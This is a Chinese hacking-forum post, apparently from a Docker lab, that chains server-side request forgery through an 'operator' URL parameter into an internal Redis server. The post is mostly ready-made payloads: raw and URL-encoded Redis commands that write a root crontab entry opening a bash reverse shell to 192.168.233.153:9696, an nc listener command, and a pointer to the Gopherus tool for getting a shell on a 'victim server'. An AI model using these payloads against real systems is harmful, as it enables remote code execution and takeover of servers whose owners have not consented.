只需一步,快速开始
docker-compose build docker-compose up -d
operator=http://127.0.0.1:7001&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtS earchfor=&selfor=Business location&btnSubmit=Search
crontab就是linux下的一个定时执行事件的一个程序 ,可以通过向/etc/corntab中写入相应命令 以一定时间间隔调度一些命令的执行。
nc -nvlp 9696
test set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.233.153/9696 0>&1\n\n\n\n" config set dir /etc/ config set dbfilename crontab save hhh
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20% 3E%26%20%2Fdev%2Ftcp%2F192.168.233.153%2F9696%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig %20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Ahhh
operator=http://172.18.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20 *%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.233.153%2F9696%200%3E%261%5Cn%5Cn%5 Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0 Asave%0D%0A%0D%0Ahhh&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Busine ss location&btnSubmit=Search
工具将帮助您生成Gopher有效负载,以利用SSRF(服务器端请求伪造)并获得RCE远程代码执行 而且它将帮助您在受害服务器上获得shell。
python gopherus.py --exploit redis
举报
本版积分规则 发表回复 回帖后跳转到最后一页
手机版|小黑屋|VIP|电脑疯子技术论坛 ( Computer madman team )
GMT+8, 2025-3-14 04:21
Powered by Discuz! X3.4
Copyright © 2001-2023, Tencent Cloud.